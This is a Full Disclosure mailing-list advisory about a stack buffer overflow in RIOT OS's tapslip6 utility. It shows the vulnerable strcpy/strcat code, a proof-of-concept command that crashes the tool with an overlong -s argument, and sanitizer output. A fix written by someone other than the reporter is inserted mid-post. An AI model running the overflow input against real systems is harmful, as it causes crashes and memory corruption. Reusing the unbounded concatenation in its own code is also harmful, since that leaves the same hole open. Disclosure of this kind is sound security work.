Message-ID: <CAFmK-GxBXmHZqfPMxWnJt_ku-fjyFqbKG9xF0_6iOr6p8KSLbQ@mail.gmail.com>
Date: Thu, 8 Jan 2026 10:42:45 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in tapslip6 Utility via Unbounded Device Path Construction

A stack-based buffer overflow vulnerability exists in the tapslip6 utility
distributed with RIOT OS (and derived from the legacy uIP/Contiki
networking tools). The vulnerability is caused by unsafe string
concatenation in the devopen() function, which constructs a device path
using unbounded user-controlled input.

Specifically, tapslip6 uses strcpy() and strcat() to concatenate the fixed
prefix "/dev/" with a user-supplied device name provided via the -s
command-line option. No bounds checking is performed, allowing an attacker
to supply an excessively long device name and overflow a fixed-size stack
buffer. This issue can lead to process crashes and memory corruption. While
exploitation requires local access, the affected utility is commonly
executed with elevated privileges during development, testing, or
deployment of RIOT OS networking environments, increasing impact.

*Root Cause:*

int devopen(const char *dev, int flags)
{
    char t[1024];
    strcpy(t, "/dev/");
    strcat(t, dev);     /* no length check: dev is the raw -s argument, t is a fixed 1024-byte stack buffer */
    return open(t, flags);
}
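For comparison, a bounded replacement for the devopen() shown above, added here as an example and not taken from RIOT or from the reporter. It builds the path with snprintf() and checks the returned length, so a device name that would not fit (such as the 3000-byte one in the proof of concept) is rejected with ENAMETOOLONG instead of being written past the end of the 1024-byte buffer. The names build_dev_path, devopen_safe, path_for and try_name_of_length are assumptions introduced for this example.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical hardened helper: writes "/dev/<dev>" into out[outsz].
 * Returns 0 on success; -1 with errno = EINVAL (empty name) or
 * ENAMETOOLONG (would not fit, including the terminating NUL). */
int build_dev_path(char *out, size_t outsz, const char *dev)
{
    if (dev == NULL || *dev == '\0' || outsz == 0) {
        errno = EINVAL;
        return -1;
    }
    /* snprintf never writes more than outsz bytes and returns the length
     * the full string would have needed, which is what we check. */
    int n = snprintf(out, outsz, "/dev/%s", dev);
    if (n < 0) {
        errno = EINVAL;
        return -1;
    }
    if ((size_t)n >= outsz) {
        /* Truncated: refuse rather than open a silently shortened path. */
        out[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Drop-in shape of the original devopen(), same 1024-byte buffer, bounded. */
int devopen_safe(const char *dev, int flags)
{
    char t[1024];
    if (build_dev_path(t, sizeof t, dev) != 0)
        return -1;          /* errno already set by build_dev_path */
    return open(t, flags);
}

/* Test helper: 1 if building the path for dev yields exactly expected. */
int path_for(const char *dev, const char *expected)
{
    char out[1024];
    if (build_dev_path(out, sizeof out, dev) != 0)
        return 0;
    return strcmp(out, expected) == 0;
}

/* Test helper: result of build_dev_path for a constructed name of len 'A's
 * (mirrors the "A"*3000 input from the proof of concept). */
int try_name_of_length(size_t len)
{
    char name[4096];
    char out[1024];
    if (len >= sizeof name)
        len = sizeof name - 1;
    memset(name, 'A', len);
    name[len] = '\0';
    return build_dev_path(out, sizeof out, name);
}

int main(void)
{
    char path[1024];
    if (build_dev_path(path, sizeof path, "tap0") == 0)
        printf("ok: %s\n", path);
    if (try_name_of_length(3000) != 0)
        printf("rejected 3000-byte name: %s\n", strerror(errno));
    return 0;
}
```

The boundary is exact: "/dev/" plus 1018 characters is 1023 bytes and still fits with its NUL, while 1019 characters needs 1024 bytes plus the terminator and is refused. Checking the return value of snprintf() matters as much as using it; a truncated path that opened some unrelated device would be a quieter but still wrong outcome.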

*Impact:*

   - Stack-based buffer overflow
   - Process termination (Denial of Service)
   - Memory corruption

*Proof of Concept:*

./tapslip6 -s $(python3 - << 'EOF'
print("A"*3000)
EOF
) 10.0.0.1 255.255.255.0

*Output:*

=================================================================
==492967==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xfbffa6001140 at pc 0xaaaab3e609a4 bp 0xffffd6e212c0 sp 0xffffd6e20ab0
WRITE of size 3001 at 0xfbffa6001140 thread T0
    #0 0xaaaab3e609a0 in strcat (/root/RIOT/dist/tools/tunslip/tapslip6+0xc09a0) (BuildId: cf8e25195b4cb64b5a381ae2324d1971ccc6d6ab)
    #1 0xaaaab3ec04f0 in devopen /root/RIOT/dist/tools/tunslip/tapslip6.c:420:5
    #2 0xaaaab3ec04f0 in main /root/RIOT/dist/tools/tunslip/tapslip6.c:629:18
    #3 0xffffa7a42598 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0xffffa7a42678 in __libc_start_main csu/../csu/libc-start.c:360:3
    #5 0xaaaab3dd73ec in _start (/root/RIOT/dist/tools/tunslip/tapslip6+0x373ec) (BuildId: cf8e25195b4cb64b5a381ae2324d1971ccc6d6ab)

Address 0xfbffa6001140 is located in stack of thread T0 at offset 4416 in frame
    #0 0xaaaab3ebfef8 in main /root/RIOT/dist/tools/tunslip/tapslip6.c:543

SUMMARY: AddressSanitizer: stack-buffer-overflow (/root/RIOT/dist/tools/tunslip/tapslip6+0xc09a0) (BuildId: cf8e25195b4cb64b5a381ae2324d1971ccc6d6ab) in strcat
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
